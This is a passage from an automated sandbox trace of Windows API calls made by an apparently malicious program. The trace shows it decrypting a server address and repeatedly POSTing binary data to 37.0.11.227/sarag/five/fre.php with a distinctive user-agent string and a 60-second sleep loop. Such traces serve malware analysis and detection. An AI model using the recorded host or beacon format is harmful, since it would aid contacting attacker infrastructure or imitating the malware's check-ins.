hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0325.302] GetProcessHeap () returned 0x690000 [0325.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.303] GetProcessHeap () returned 0x690000 [0325.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0325.303] GetProcessHeap () returned 0x690000 [0325.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0325.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1890) returned 0xb44 [0325.307] Sleep (dwMilliseconds=0xea60) [0325.308] GetProcessHeap () returned 0x690000 [0325.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0325.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0325.327] GetProcessHeap () returned 0x690000 [0325.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0325.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.328] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0325.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.329] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.331] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.331] GetProcessHeap () returned 0x690000 [0325.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0325.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.333] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0325.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.342] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0325.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.343] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0325.343] GetProcessHeap () returned 0x690000 [0325.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.344] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.345] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.346] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.347] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.347] GetProcessHeap () returned 0x690000 [0325.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0325.348] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0325.348] GetProcessHeap () returned 0x690000 [0325.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0325.348] GetProcessHeap () returned 0x690000 [0325.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.349] GetProcessHeap () returned 0x690000 [0325.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0325.349] GetProcessHeap () returned 0x690000 [0325.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0325.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.350] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0325.366] GetProcessHeap () returned 0x690000 [0325.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0325.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.367] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0325.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.368] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.369] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.369] GetProcessHeap () returned 0x690000 [0325.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0325.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.371] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0325.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.372] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0325.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.373] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0325.373] GetProcessHeap () returned 0x690000 [0325.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.374] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0325.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.375] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0325.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.376] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0325.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0325.378] GetProcessHeap () returned 0x690000 [0325.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0325.378] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0325.378] GetProcessHeap () returned 0x690000 [0325.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0325.378] socket (af=2, type=1, protocol=6) returned 0xb48 [0325.378] connect (s=0xb48, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0325.407] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0325.407] GetProcessHeap () returned 0x690000 [0325.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0325.407] GetProcessHeap () returned 0x690000 [0325.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0325.408] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.409] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0325.409] GetProcessHeap () returned 0x690000 [0325.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0325.409] GetProcessHeap () returned 0x690000 [0325.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.410] GetProcessHeap () returned 0x690000 [0325.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0325.410] GetProcessHeap () returned 0x690000 [0325.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0325.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.412] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0325.412] GetProcessHeap () returned 0x690000 [0325.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0325.412] GetProcessHeap () returned 0x690000 [0325.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.412] send (s=0xb48, buf=0x6ad508*, len=242, flags=0) returned 242 [0325.413] send (s=0xb48, buf=0x6aba40*, len=159, flags=0) returned 159 [0325.413] GetProcessHeap () returned 0x690000 [0325.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0325.413] recv (in: s=0xb48, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0325.510] GetProcessHeap () returned 0x690000 [0325.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0325.511] GetProcessHeap () returned 0x690000 [0325.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0325.511] GetProcessHeap () returned 0x690000 [0325.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0325.512] GetProcessHeap () returned 0x690000 [0325.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0325.512] closesocket (s=0xb48) returned 0 [0325.513] GetProcessHeap () returned 0x690000 [0325.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0325.513] GetProcessHeap () returned 0x690000 [0325.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.514] GetProcessHeap () returned 0x690000 [0325.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0325.515] GetProcessHeap () returned 0x690000 [0325.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0325.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1894) returned 0xb48 [0325.600] Sleep (dwMilliseconds=0xea60) [0325.702] GetProcessHeap () returned 0x690000 [0325.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0325.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0325.724] GetProcessHeap () returned 0x690000 [0325.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0325.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.725] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0325.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.726] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.727] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.727] GetProcessHeap () returned 0x690000 [0325.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0325.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.730] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0325.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.734] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0325.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.735] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0325.735] GetProcessHeap () returned 0x690000 [0325.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.736] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.737] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.738] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.738] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.738] GetProcessHeap () returned 0x690000 [0325.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0325.739] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0325.741] GetProcessHeap () returned 0x690000 [0325.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0325.742] GetProcessHeap () returned 0x690000 [0325.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.742] GetProcessHeap () returned 0x690000 [0325.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0325.743] GetProcessHeap () returned 0x690000 [0325.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0325.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0325.757] GetProcessHeap () returned 0x690000 [0325.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0325.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.758] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0325.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.759] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.760] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.760] GetProcessHeap () returned 0x690000 [0325.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0325.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.764] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0325.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.765] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0325.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.766] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0325.767] GetProcessHeap () returned 0x690000 [0325.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.768] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0325.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.769] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0325.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.770] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0325.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.775] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0325.775] GetProcessHeap () returned 0x690000 [0325.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0325.775] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0325.775] GetProcessHeap () returned 0x690000 [0325.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0325.775] socket (af=2, type=1, protocol=6) returned 0xb4c [0325.776] connect (s=0xb4c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0325.799] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0325.799] GetProcessHeap () returned 0x690000 [0325.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0325.799] GetProcessHeap () returned 0x690000 [0325.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0325.800] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.801] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0325.801] GetProcessHeap () returned 0x690000 [0325.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0325.801] GetProcessHeap () returned 0x690000 [0325.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.801] GetProcessHeap () returned 0x690000 [0325.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0325.801] GetProcessHeap () returned 0x690000 [0325.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0325.802] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0325.803] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0325.803] GetProcessHeap () returned 0x690000 [0325.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0325.803] GetProcessHeap () returned 0x690000 [0325.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0325.806] send (s=0xb4c, buf=0x6ad508*, len=242, flags=0) returned 242 [0325.807] send (s=0xb4c, buf=0x6aba40*, len=159, flags=0) returned 159 [0325.807] GetProcessHeap () returned 0x690000 [0325.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0325.807] recv (in: s=0xb4c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0325.882] GetProcessHeap () returned 0x690000 [0325.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0325.882] GetProcessHeap () returned 0x690000 [0325.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0325.883] GetProcessHeap () returned 0x690000 [0325.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0325.884] GetProcessHeap () returned 0x690000 [0325.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0325.885] closesocket (s=0xb4c) returned 0 [0325.885] GetProcessHeap () returned 0x690000 [0325.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0325.885] GetProcessHeap () returned 0x690000 [0325.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.886] GetProcessHeap () returned 0x690000 [0325.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0325.886] GetProcessHeap () returned 0x690000 [0325.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0325.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1898) returned 0xb4c [0325.889] Sleep (dwMilliseconds=0xea60) [0325.890] GetProcessHeap () returned 0x690000 [0325.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0325.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 